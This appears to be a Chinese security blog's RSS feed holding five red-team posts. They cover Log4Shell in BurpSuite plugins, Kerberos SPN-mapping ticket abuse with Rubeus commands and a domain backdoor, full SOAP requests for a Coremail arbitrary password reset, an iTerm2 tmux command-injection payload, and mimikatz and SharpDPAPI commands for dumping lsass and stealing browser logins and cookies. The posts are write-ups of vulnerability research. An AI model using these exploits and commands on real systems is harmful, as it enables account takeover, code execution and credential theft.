分类乐色桶 https://wechat2rss.xlab.app/feed/5978638470af63bf67edad170b4e8e9eb945b948.xml 记录个人生活 (wechat feed made by @ttttmr https://wechat2rss.xlab.app) (分类乐色桶) https://wx.qlogo.cn/mmhead/Q3auHgzwzM7nCVW6KXkxODbGFTBvfJJd5Y3DOyvxjq9nSrUsj5A9XQ/0 分类乐色桶 https://wechat2rss.xlab.app/feed/5978638470af63bf67edad170b4e8e9eb945b948.xml Log4shell中被忽视的威胁:BurpSuite插件 https://mp.weixin.qq.com/s?__biz=MzA3MzI1MTIzMw==&mid=2247483711&idx=1&sn=470e496f4e761cccadf962a23b493573 log4shell可以说是这几天最火爆的漏洞,对于红队人员,算是过了个早年。 原创 Lz1y 2021-12-14 02:00

log4shell可以说是这几天最火爆的漏洞,对于红队人员,算是过了个早年。



log4shell可以说是这几天最火爆的漏洞,对于红队人员,算是过了个早年。不过此漏洞覆盖范围之广,也可能殃及你我。

这个漏洞已经爆出来好几天了,各大厂商都开始陆陆续续的修复,人们的目光仍然放在各种上层应用中,想着办法武器化。不过这个洞可能不只是蓝队人员的心头恨,也有可能反噬到隔岸观火的红队。

被忽视的威胁:BurpSuite 插件

BurpSuite大家都熟悉,其中插件开发最常用的语言就是Java了,其中笔者发现也有不少的插件使用到了存在缺陷的log4j2库,其中不乏一些高人气的库。我使用Github API编写了简易爬虫,去爬取了官方库和民间热门的库推荐项目:

https://github.com/PortSwiggerhttps://github.com/snoopysecurity/awesome-burp-extensions

我通过简单的搜索项目中代码是否包含log4j,从而判断库是否存在威胁。结果如下:

项目名Stars
bit4woo/domain_hunter_pro818
nccgroup/LoggerPlusPlus437
denimgroup/threadfix339
h3xstream/burp-retire-js196
NetSPI/Wsdler177
GoSecure/csp-auditor130
nccgroup/CollaboratorPlusPlus107
vulnersCom/burp-Dirbuster67
bit4woo/ReSign49
tls-attacker/TLS-Attacker-BurpExtension36
h3xstream/burp-image-metadata14
CyRadarInc/crypto-messages-handler3
PortSwigger/burp-teamcity-integration0

其中不乏PortSwigger官方插件,不少都已经在BAPP中,甚至还有高人气的Logger++,请各位玩家小心菊花,注意自查。结果肯定难免会有一些遗漏误报,国内有很多插件甚至没有开源过,所以各位千万要注意~




阅读原文

跳转微信打开

]]> Tue, 14 Dec 2021 02:00:00 +0800 域渗透之滥用SPN mappings https://mp.weixin.qq.com/s?__biz=MzA3MzI1MTIzMw==&mid=2247483704&idx=1&sn=7a4d7ebd9a6433abb7256088f605c5b2 在刚刚结束的N1CTF中, 我出了一道很简短的域渗透题目, 其中第三关个人感觉比较有意思, 单独抽出来分享一下. Lz1y 2020-10-20 12:57

在刚刚结束的N1CTF中, 我出了一道很简短的域渗透题目, 其中第三关个人感觉比较有意思, 单独抽出来分享一下.

在刚刚结束的N1CTF中, 我出了一道很简短的域渗透题目, 其中第三关个人感觉比较有意思, 单独抽出来分享一下.



滥用SPN mappings

笔者第一次了解到这个属性是通过ad security关于spn的文章:

https://adsecurity.org/?page_id=183

Domain Controllers automatically map common SPNs to the “HOST” SPN. The HOST SPN is automatically added to the ServicePrincipalName attribute for all computer accounts when the computer is joined to the domain.

可以了解到,HOST这个ServiceName实际上是很多个ServiceName的映射,相关属性被称作SPNMappings,当个访问集合中的成员时,会被映射到HOST。经过一些测试之后发现,Host票据实际上是一种万能票据,默认的映射集如下:


host=alerter,appmgmt,cisvc,clipsrv,browser,dhcp,dnscache,replicator,eventlog,eventsystem,policyagent,oakley,dmserver,dns,mcsvc,fax,msiserver,ias,messenger,netlogon,netman,netdde,netddedsm,nmagent,plugplay,protectedstorage,rasman,rpclocator,rpc,rpcss,remoteaccess,rsvp,samss,scardsvr,scesrv,seclogon,scm,dcom,cifs,spooler,snmp,schedule,tapisrv,trksvr,trkwks,ups,time,wins,www,http,w3svc,iisadmin,msdtc

其中包含很多我们常用到的service,比如cifs,ldap等。

当我们拥有这个映射列表中的任意一张服务票据(包括HOST)的时候, 我们就可以将其转成列表中其他的任意一张服务票据.


那么如何操作呢?非常简单,只需要修改sname即可,这里最简单的方法就是在serviceName长度相同的情况下,我们可以直接修改文件hex中sname.

将其修改为CIFS

即可.

如此一来我们就把Host服务票据转成了CIFS服务票据,请允许我单方面称之为铜票(copper ticket)。


在与Daiker交流之后发现, 这个姿势其实impacket和Rubeus都已经兼容了, 但是并没有具体文章说明.

其中Impacket的psexec.py可以直接使用Host或者映射其的票据自动转成cifs服务票据.

而Rubeus则需要添加一个特殊参数altservice转换.

ps: Rubeus介绍中认为是KRB-CRED不保护sname字段,所以可以随便改, 而我在这里补充一下是由于spn mappings才可以任意修改sname, 因为本质上都是HOST服务票据.


Rubeus.exe tgssub </ticket:BASE64 | /ticket:FILE.KIRBI> /altservice:ldap [/ptt] [/luid] [/nowrap]Rubeus.exe s4u </ticket:BASE64 | /ticket:FILE.KIRBI> </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap]


补充案例,这里我直接使用题目环境来作为演示:

使用Powerview找到UserA约束委派了HOST/DC. 

直接使用s4u获取到TGS

接着,导出票据到物理文件中:

[IO.File]::WriteAllBytes("ticket.kirbi",[Convert]::FromBase64String("<bas64_ticket>"))


按照上文修改sname(或者直接使用Impacket或Rubeus相关功能)为CIFS.

接下来将修改后的票据PTT之后呢, 就可以直接访问DC的CIFS服务了, 如此一来, 我们就成功滥用了SPN mapping.


此技术也可用于后门, 在拿下域控后, 我们使用添加约束委派 time/DC 给某个后门用户, 之后我们就可以随意获取到time/DC的tgs, 并可以将其转变成CIFS/LDAP等服务的票据.

阅读原文

跳转微信打开

]]> Tue, 20 Oct 2020 12:57:00 +0800 Coremail nday 任意密码修改复现 https://mp.weixin.qq.com/s?__biz=MzA3MzI1MTIzMw==&mid=2247483691&idx=1&sn=245c751d2a16034e1d45e67f17def18f Coremail nday 任意密码修改复现 原创 Lz1y 2020-05-28 15:27

Coremail nday 任意密码修改复现

Nday 任意密码修改

POST /apiws/services/UserService HTTP/1.1

Pragma: no-cache

Cache-Control: no-cache

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.0.106/apiws/services

Accept-Encoding: gzip, deflate

Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,zh-TW;q=0.6

Connection: close

SOAPAction:

Content-Type: text/xml;charset=UTF-8

Host: 192.168.0.106

Content-Length: 331

 

<soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:apiw="http://coremail.cn/apiws">

  <soapenv:Header/>

  <soapenv:Body>

     <apiw:queryTheUser>

        <!--type: string-->

        <loginName>test@coremail.cn</loginName>

     </apiw:queryTheUser>

  </soapenv:Body></soapenv:Envelope>



获取用户信息,然后直接复制到下面的请求中,修改密码为明文即可。

POST /apiws/services/UserService HTTP/1.1

Pragma: no-cache

Cache-Control: no-cache

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.0.106/apiws/services

Accept-Encoding: gzip, deflate

Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,zh-TW;q=0.6

Connection: close

SOAPAction:

Content-Type: text/xml;charset=UTF-8

Host: 192.168.0.106

Content-Length: 431

 

<soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:apiw="http://coremail.cn/apiws">

  <soapenv:Header/>

  <soapenv:Body>

     <apiw:updateTheUser>

        <!--type: string-->

        <user>{

"loginName":"test@coremail.cn",

"name":"aaaaa1'",

"nick_name":null,

"orgId":null,

"password":"111111",

"status":"0"}</user>

     </apiw:updateTheUser>

  </soapenv:Body></soapenv:Envelope>


 


阅读原文

跳转微信打开

]]> Thu, 28 May 2020 15:27:00 +0800 [CVE-2019-9535] Iterm2命令执行的不完整复现 https://mp.weixin.qq.com/s?__biz=MzA3MzI1MTIzMw==&mid=2247483682&idx=1&sn=9a69f705c0f65bf629118b623784ef1c CVE-2019-9535的一次不完整复现 原创 Lz1y 2019-10-12 15:26

CVE-2019-9535的一次不完整复现


CVE-2019-9535

昨天爆出了一个Iterm2的代码执行漏洞,看着非常的刺激吓人,因为我也在用,所以趁热赶紧尝试复现一下。源头文章是来自:https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/

mozilla他们通过MOSS自动审计出来的(?)。

历程

首先通过关键字找到对应的commit记录:https://github.com/gnachman/iTerm2/commit/538d570ea54614d3a2b5724f820953d717fbeb0c

根据commit描述,可以看到这个就是CVE-2019-9535的补丁,而洞的根本原因大概可以了解到。

  1. 有关于 session name

  2. 与 set-titles-stringstatus-left, and status-right这三个变量有关。

  3. 是轮询获取title的,所以应该是自动触发的。

我之前都是没有使用过Tmux的,而是使用Screen,所以Iterm2并没有集成Tmux环境。

安装Tmux集成环境

根据Iterm2文档:https://iterm2.com/documentation-tmux-integration.html

使用homebrew自动安装即可-- brew install tmux

然后就能使用 tmux-CC建立起tmux服务了。启动后,会新建一个tmux窗口

Tmux命令

根据man文档,能够很快的找到Tmux相关的指令以及参数:http://man7.org/linux/man-pages/man1/tmux.1.html

  1.      set-titles-string string
  2.              String used to set the client terminal title if set-titles is
  3.              on.  Formats are expanded, see the FORMATS section.
  4.      status-left string
  5.              Display string (by default the session name) to the left of the
  6.              status line.  string will be passed through strftime(3).  Also
  7.              see the FORMATS and STYLES sections.

  9.              For details on how the names and titles can be set see the
  10.              NAMES AND TITLES section.

  12.              Examples are:

  14.                    #(sysctl vm.loadavg)
  15.                    #[fg=yellow,bold]#(apm -l)%%#[default] [#S]

  17.              The default is ‘[#S] ’.
  18.      status-right string
  19.              Display string to the right of the status line.  By default,
  20.              the current pane title in double quotes, the date and the time
  21.              are shown.  As with status-left, string will be passed to
  22.              strftime(3) and character pairs are replaced.

通过文档,可以发现,这三个都是字符串类型的变量。而根据描述其默认都是打印出 session name的值。根据猜测,这三个应该是平行的Sink,所以接下来我们需要去找到漏洞的Source。

简单审计

接下来带入到补丁中看。根据关键字很快的定位到代码

审计一下修补前的代码

  1. - (void)requestUpdates {
  2.     _accelerated = NO;
  3.     [_gateway sendCommand:@"display-message -p \"#{status-left}\"" responseTarget:self responseSelector:@selector(handleStatusLeftResponse:)];
  4.     [_gateway sendCommand:@"display-message -p \"#{status-right}\"" responseTarget:self responseSelector:@selector(handleStatusRightResponse:)];
  5. }

其实我也不知道这是什么语言...但是还是硬着头皮看下去。根据关键字判断,这里是将 display-message-p"#{status-right}"命令的返回值传递到了 handleStatusrightResponse函数中。
我们可以在Tmux Server中执行Command,看一下这句命令的返回值是啥

接着把返回值传递进handleStatusRightResponse函数,这里可以看到在handleStatusRightResponse函数中,执行命令之前,对参数进行了一次过滤,很明显是防止命令注入的,此时答案呼之欲出:这就是个二次的(Tmux)命令注入啊!

  1. - (void)handleStatusrightResponse:(NSString *)response {
  2.     if (!response) {
  3.         return;
  4.     }
  5.     NSString *command = [NSString stringWithFormat:@"display-message -p \"%@\"", [self escapedString:response]];
  6.     [_gateway sendCommand:command responseTarget:self responseSelector:@selector(handleStatusrightValueExpansionResponse:)];
  7. }
  8. - (NSString *)escapedString:(NSString *)string {
  9.     return [[string stringByReplacingOccurrencesOfString:@"\\" withString:@"\\\\"]
  10.                     stringByReplacingOccurrencesOfString:@"\"" withString:@"\\\""];
  11. }

根据原文当中的提示,需要用户运行一些无危害的命令,而这个无危害的命令应该就是对 status-right进行赋值:

  1. tmux set-option -g status-right "[#S]"

这里便是攻击的Source点了,第一次 display-message-p"#{status-right}",返回"[#S]",然后将其拼接入第二次 display-message-- display-message-p"[#S]",但是根据资料,以及测试,并没有办法一行执行多条语句,并且由于转义无法逃逸出双引号的包裹,此时不由的想到了CRLF。

根据文档得知 run可以运行程序,尝试在Server console中执行命令:

  1. display -p 1
  2. run 'open /Applications/Calculator.app'


可以看到,两条语句都成功执行。接下来测试第一条语句错误,第二条语句是否会执行:

  1. display -p "1
  2. run 'open /Applications/Calculator.app'

此时,第一条命令并没有闭合,所以无法执行,但第二条语句还是成功执行了

此时,攻击链就完整了。

首先欺骗用户输入:

  1. tmux set-option -g status-right "#{?window_bigger,[#{window_offset_x}#,#{window_offset_y}] ,}\"\"#{=21:pane_title}\" %H:%M %d-%b-%y
  2. run 'open /Applications/Calculator.app'#"

在启动Tmux的时候,由于Status Bars需要轮询Tmux的 status-right,用于更新Iterm2的显示,所以会自动触发上述漏洞链,造成代码执行:

至此,起码是命令执行了。这样的利用链不止一条,除了 status-right以外, status-leftset-titles-string的利用链也是同样原理。

关于Session name

一开始把目光放在了 Escapesequences上,以为是自动触发的漏洞。但是怎么样都没办法找到利用点,不过应该只是我没找到...

根据文档

  1. Control sequences in tmux (like \e]0;title\\\e) modify the session name.

  3. printf "\e]0;title\\\e" 可以修改Session nametitle  # 需要先打开set-titles(set-option -g set-titles on)
  1.      allow-rename [on | off]
  2.              Allow programs in the pane to change the window name using a
  3.              terminal escape sequence (\ek...\e\\).

  5. printf "\ekWindows_NAME\e\\" 可以自动修改窗口名,需要打开allow-rename

我认为这一条线才是洞主演示视频中的自动触发的线,只要终端中打印了对应的 Escapesequences则会触发修改字段,从而将攻击者修改的字段注入进命令中,可惜我并没有找到链。并且这条线需要用户开启对应设置。

首先也是Iterm轮询客户端的标题,进行自动更新:

  1. - (void)installTmuxTitleMonitor {
  2.     if (_tmuxTitleMonitor) {
  3.         return;
  4.     }
  5.     __weak __typeof(self) weakSelf = self;
  6.     _tmuxTitleMonitor = [[iTermTmuxOptionMonitor alloc] initWithGateway:_tmuxController.gateway
  7.                                                                  scope:self.variablesScope
  8.                                                                 format:@"#{pane_title}"
  9.                                                                 target:[NSString stringWithFormat:@"%%%@", @(self.tmuxPane)]
  10.                                                           variableName:iTermVariableKeySessionTmuxPaneTitle
  11.                                                                  block:^(NSString * _Nonnull title) {
  12.                                                                      if (title) {
  13.                                                                          [weakSelf setSessionSpecificProfileValues:@{ KEY_TMUX_PANE_TITLE: title ?: @""}];
  14.                                                                          [weakSelf.delegate sessionDidUpdatePaneTitle:self];
  15.                                                                      }
  16.                                                                  }];
  17.     [_tmuxTitleMonitor updateOnce];
  18. }
  1. - (NSString *)escapedFormat {
  2.     return [[_format stringByReplacingOccurrencesOfString:@"\\" withString:@"\\\\"]
  3.             stringByReplacingOccurrencesOfString:@"'" withString:@"\\'"];
  4. }

  6. - (void)update:(NSTimer *)timer {
  7.     [self updateOnce];
  8. }

  10. - (void)updateOnce {
  11.     if (_haveOutstandingRequest) {
  12.         DLog(@"Not making a request because one is outstanding");
  13.         return;
  14.     }
  15.     _haveOutstandingRequest = YES;
  16.     NSString *command = [NSString stringWithFormat:@"display-message -t '%@' -p '%@'", _target, self.escapedFormat];
  17.     DLog(@"Request option with command %@", command);
  18.     [self.gateway sendCommand:command
  19.                responseTarget:self
  20.              responseSelector:@selector(didFetch:)
  21.                responseObject:nil
  22.                         flags:kTmuxGatewayCommandShouldTolerateErrors];
  23. }

  25. - (void)didFetch:(NSString *)value {
  26.     DLog(@"Did fetch %@", value);
  27.     if (!value) {
  28.         // Probably the pane went away and we'll be dealloced soon.
  29.         return;
  30.     }
  31.     _haveOutstandingRequest = NO;
  32.     if (_variableName) {
  33.         [self.scope setValue:value forVariableNamed:_variableName];
  34.     }
  35.     if (_block) {
  36.         _block(value);
  37.     }
  38. }

这咋是个回调-回调函数....

  1. block:^(NSString * _Nonnull title) {
  2.                                                                      if (title) {
  3.                                                                          [weakSelf setSessionSpecificProfileValues:@{ KEY_TMUX_PANE_TITLE: title ?: @""}];
  4.                                                                          [weakSelf.delegate sessionDidUpdatePaneTitle:self];
  5.                                                                      }
  6.                                                                  }];



  10. - (BOOL)onUpdateTitle {
  11.     NSString *tmuxPaneTitle = [self stringForKey:KEY_TMUX_PANE_TITLE];
  12.     if (!tmuxPaneTitle) {
  13.         return NO;
  14.     }
  15.     if ([_profileNameFieldForEditCurrentSession textFieldIsFirstResponder] && _profileNameFieldForEditCurrentSession.window.isKeyWindow) {
  16.         // Don't allow it to change to a server-set value during editing.
  17.         return YES;
  18.     }
  19.     _profileNameFieldForEditCurrentSession.stringValue = tmuxPaneTitle;
  20.     return YES;
  21. }

实际上就是把我们的pane标题传入到了block这个函数中。然后实际就是把标题赋值给了KEYTMUXPANETITLE这个全局变量(全大写,应该是全局吧...),最后传递给了profileNameFieldForEditCurrentSession。

跟到这里就无疾而终了,因为从始自终都只执行了一次 display-message,没有将 #{pane_title}的值拼接入某个语句,当然也有可能是在另外一个文件使用到了,但我实在是看不懂这个语言,并且Iterm2偷偷把我下的所有版本都给升级到最新了,只好作罢

最后,在3.30版本是一个分水岭,以这版本为界限,增加了修改标题的渠道,低于这个版本的只能去设置里面改,而高于这个版本的则可以使用 Escapesequences.

演示

< 3.30(实际上就是个CRLF->命令注入,注入点跟上述的不大一样,不过没继续跟)

3.3.0=< version <3.3.6


阅读原文

跳转微信打开

]]> Sat, 12 Oct 2019 15:26:00 +0800 通过Dpapi获取Windows身份凭证 https://mp.weixin.qq.com/s?__biz=MzA3MzI1MTIzMw==&mid=2247483665&idx=1&sn=01a45c841616cf26bd68c4b062ceff23 使用Dpapi的Masterkey解密用户的敏感信息 原创 Lz1y 2019-10-09 17:35

使用Dpapi的Masterkey解密用户的敏感信息


一开始想写的比较多,后来想了下还是算了,作为笔记简单记录下。

Dpapi简述

从Windows 2000开始,Microsoft随操作系统一起提供了一种特殊的数据保护接口,称为Data Protection Application Programming Interface(DPAPI)。其分别提供了加密函数CryptProtectData 与解密函数 CryptUnprotectData 以用作敏感信息的加密解密。

其用作范围包括且不限于:

  • IE、Chrome的登录表单自动完成

  • Powershell加密函数

  • Outlook, Windows Mail, Windows Mail, 等邮箱客户端的用户密码。

  • FTP管理账户密码

  • 共享资源文件夹的访问密码

  • 无线网络帐户密钥和密码

  • 远程桌面身份凭证

  • EFS

  • EAP/TLS 和 802.1x的身份凭证

  • Credential Manager中的数据

  • 以及各种调用了CryptProtectData函数加密数据的第三方应用,如Skype, Windows Rights Management Services, Windows Media, MSN messenger, Google Talk等。

  • etc

由于功能需求,Dpapi采用的加密类型为对称加密,所以只要找到了密钥,就能解开物理存储的加密信息了。

Master Key Files

存放密钥的文件则被称之为 MasterKeyFiles,其路径一般为 %APPDATA%/Microsoft/Protect/%SID%。而这个文件中的密钥实际上是随机64位字节码经过用户密码等信息的加密后的密文,所以只需要有用户的明文密码/Ntlm/Sha1就可以还原了。

其中,除了GUID命名的文件之外,还存在一个名为 Preferred的文件。

Preferred

为了安全考虑, MasterKey是每90天就会更新一次,而 Preferred文件中记录了目前使用的是哪一个 MasterKey文件以及其过期时间,这里这个文件并没有经过任何加密,只需要了解其结构体就可以任意篡改,三好学生师傅已经写过相关内容,我就不在赘述了:
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E8%8E%B7%E5%8F%96Windows%E7%B3%BB%E7%BB%9F%E4%B8%8BDPAPI%E4%B8%AD%E7%9A%84MasterKey/

CREDHIST

此外,在 %APPDATA%/Microsoft/Protect/目录下还有一个 CREDHIST文件。由于 MasterKey的还原与用户密码相关,所以需要保存用户的历史密码信息以确保接口的正常使用,而此文件中就保存了用户的历史密码(Ntlm hash/sha1 hash)。感兴趣的可以自己去查查资料,mimikatz中有这个相关功能,但是没有案例,需要自行阅读源码~

ps: 这些相关文件都被作为系统文件隐藏起来了,所以需要修改文件夹选项显示这些文件

获取Master Key

这里列举几个常见的手段(非域环境):

  • 用户身份凭证(或者历史用户身份凭证)

  • DPAPISYSTEM(DPAPISYSTEM作为 MasterKey本地备份文件的密钥存放于LSA secret中,想要获取的话也就老办法,dump内存或者注册表即可)

  • Dump Lsass

用户身份凭证

使用mimikatz的dpapi模块中的masterkey方法,指定目标用户 master key file。在无凭证传入的情况下,仅仅只是解析了结构体。

带入参数 /hash或者 /password 输入密码,即可获取到masterkey。

DPAPI_SYSTEM

使用lsadump::secrets命令获取DPAPI_SYSTEM

使用mimikatz的dpapi模块中的masterkey方法,指定系统 master key file

获取到key。

Dump Lsass

privilege::debug提升到debug权限。
sekurlsa::dpapi获取内存中的所有MasterKey

tips
可以用dpapi::cache查看此前获取到的所有MasterKey。

可以看到,系统中存在这么多个Master key,那如何判断目标文件需要使用哪个key呢?

使用MasterKey解密

有关部分DPAPI可以解密的数据存储地址,本杰明整理了一份列表(列表失效了,但是能图中看到):
https://twitter.com/gentilkiwi/status/696021888385028096

这里使用Cred举例,其目录位于 %APPDATA%/Microsoft/Credentials/

使用dpapi::cred命令指定in参数:
dpapi::cred/in:C:\Users\11632\AppData\Local\Microsoft\Credentials\3151F79BA320A9E261AA218C58BED0A7
默认情况下会打印出其结构体信息

可以看到有一行参数guidMasterKey:{dfe23673-86ee-420c-bcab-714a83f495d6}。而 {dfe23673-86ee-420c-bcab-714a83f495d6} 就是指向MasterKey的索引,其实也就是文件名:

这样我们就可以找到文件所对应的Master key,并且解开密文了。
如果此前你已经使用之前介绍的几种方法找到了Master key,mimikatz会将其放入cache中,这样如果目标文件所对应的Master key在此前已经获取过,mimikatz会自动带入参数。

自动化利用

前面已经非常简单的介绍过相关的利用手段了,但是还是不够方便,还是需要人工手动的去解密。
这里推荐一个项目 https://github.com/GhostPack/SharpDPAPI ,程序功能出来与mimikatz没有太大区别,方便的是CNA脚本中,通过正则匹配Mimikatz导出的masterkey,然后批量的去解密credentials|vaults|RDP Cred文件。
使用流程,编译项目后,修改CNA脚本中的$SharpDPAPI::AssemblyPath为SharpDPAPI.exe的绝对路径。

  1. Use: sharpDPAPI [-dump] [-allkeys]
  2. Arguments:
  3.     -dump        Use mimikatz to dump DPAPI keys from lsass using Mimikatz's sekurlsa::dpapi
  4.     -allkeys     Use all DPAPI keys found in the credential store (not just the DPAPI keys found on this host)

初次使用就直接使用 sharpDPAPI-dump,其命令流为:

  1. sekurlsa::dpapi
  2. dpapi::cache
  3. 正则匹配Console output中的所有GuidMaster key,并把结果存入CScredman
  4. sharpDPAPI triage {GUID1}:MasterKey1  {GUID2}:MasterKey2


效果相当喜人,美中不足是没有去Dump浏览器相关的信息。
sharpDPAPI中也包含sharpChrome,其也是通过Dpapi解密获取浏览器的密码信息(/unprotect参数需要是本用户的文件)。
SharpChrome.exe cookies/target:"C:\Users\11632\AppData\Local\Google\Chrome\User Data\Default\Cookies"/unprotect
or
SharpChrome.exe logins/target:"C:\Users\11632\AppData\Local\Google\Chrome\User Data\Default\Login Data"/unprotect
效果其实也还不错,缺点就是排版难看了点,以及并没有支持其他的浏览器。

这里可以与另外一个项目 https://github.com/djhohnstein/SharpWeb 互补。此项目优点就是排版舒服了,可惜没有导出Cookie的功能(苦笑

本机测试,密码太多了就不截图了 233,请自行测试吧~

REF

https://adsecurity.org/?page_id=1821#DPAPI
https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/
https://www.passcape.com/index.php?section=docsys&cmd=details&id=28
https://github.com/gentilkiwi/mimikatz/wiki/module-~-dpapi#credhist
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files

阅读原文

跳转微信打开

]]> Wed, 09 Oct 2019 17:35:00 +0800